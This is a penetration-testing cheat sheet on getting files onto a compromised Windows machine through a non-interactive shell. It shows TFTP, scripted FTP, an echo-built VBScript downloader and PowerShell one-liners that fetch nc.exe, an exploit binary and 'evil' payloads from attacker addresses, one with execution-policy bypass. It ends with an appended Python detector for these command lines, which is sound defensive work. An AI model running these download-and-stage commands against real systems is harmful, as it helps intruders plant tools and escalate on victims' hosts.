File transfer methods

File Transfers
Limit the commands run in an obtained shell to non-interactive ones.
https://blog.netspi.com/15-ways-to-download-a-file/
TFTP
Windows XP and Windows 2003 include a TFTP client. Windows 7 does not by default.
TFTP clients are usually non-interactive, so they can work through an obtained shell.

atftpd --daemon --port 69 /tftp

Windows> tftp -i 10.10.10.10 GET nc.exe

FTP
Windows includes an FTP client, but it is usually interactive.
Solution: pass scripted commands to the ftp client with ftp -s
FTP commands:

echo open 10.10.10.10 21> ftp.txt
echo USER anonymous anonymous >> ftp.txt
echo bin >> ftp.txt
echo GET ms11-046.exe >> ftp.txt
echo bye >> ftp.txt
ftp -s:ftp.txt

VBScript
The wget.vbs script uses the echo trick again: copy and paste the commands into the shell.

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

cscript wget.vbs http://10.11.0.102/evil.exe test.txt

PowerShell

echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://10.10.10.10/evilscript.ps1" >>wget.ps1
echo $file = "evilscript.ps1" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

Using PowerShell to download files. This can be coupled with RCE or a web application such as PRTG.

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.23/nc.exe','C:/windows/znc.exe')"
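
Detection side, as an added example that is not part of the original notes: a small matcher that flags the transfer commands shown above in process-creation command lines (Sysmon Event ID 1 or Security Event ID 4688). The rule names, host names and the benign control lines are constructed for illustration.

```python
import re

# Added example: one rule per technique on this page, matched against the
# command line recorded at process creation.
RULES = [
    ("tftp_transfer", re.compile(r"\btftp(\.exe)?\b.*\s-i\s.*\b(get|put)\b", re.I)),
    ("ftp_scripted", re.compile(r"\bftp(\.exe)?\b.*\s-s:\S+", re.I)),
    ("script_host_url", re.compile(r"\b[cw]script(\.exe)?\b.*\.vbs\b.*https?://", re.I)),
    ("ps_webclient", re.compile(
        r"\bpowershell(\.exe)?\b.*net\.webclient.*download(file|string)", re.I)),
    ("ps_bypass_file", re.compile(
        r"\bpowershell(\.exe)?\b.*-e(xecution)?p(olicy)?\s+bypass\b.*-file\s+\S+", re.I)),
]

def classify(cmdline):
    """Return the names of every rule that matches one command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def scan(events):
    """Return (host, cmd, hits) for each event that matches at least one rule."""
    out = []
    for e in events:
        hits = classify(e["cmd"])
        if hits:
            out.append((e["host"], e["cmd"], hits))
    return out

# Constructed sample events. The first five command lines are the ones on this
# page; the last three are benign controls that must not alert.
SAMPLE_EVENTS = [
    {"host": "ws01", "cmd": "tftp -i 10.10.10.10 GET nc.exe"},
    {"host": "ws01", "cmd": "ftp -s:ftp.txt"},
    {"host": "ws02", "cmd": "cscript wget.vbs http://10.11.0.102/evil.exe test.txt"},
    {"host": "ws03", "cmd": "powershell.exe -ExecutionPolicy Bypass -NoLogo "
                            "-NonInteractive -NoProfile -File wget.ps1"},
    {"host": "ws04", "cmd": '''powershell -c "(new-object System.Net.WebClient).'''
                            '''DownloadFile('http://10.10.14.23/nc.exe','C:/windows/znc.exe')"'''},
    {"host": "ws05", "cmd": r"C:\Windows\System32\ftp.exe 10.10.10.10"},
    {"host": "ws05", "cmd": r"cscript //nologo C:\Scripts\inventory.vbs"},
    {"host": "ws05", "cmd": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"},
]

if __name__ == "__main__":
    for host, cmd, hits in scan(SAMPLE_EVENTS):
        print(f"{host}  {','.join(hits)}  {cmd}")
```

For the wget.ps1 variant the URL is inside the script file, so the command line only shows the policy bypass; the download call itself is visible in PowerShell script block logging (Event ID 4104). The echo lines that build ftp.txt, wget.vbs and wget.ps1 are cmd built-ins and create no process of their own when typed into an existing shell, so file-creation events are the place to catch them.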
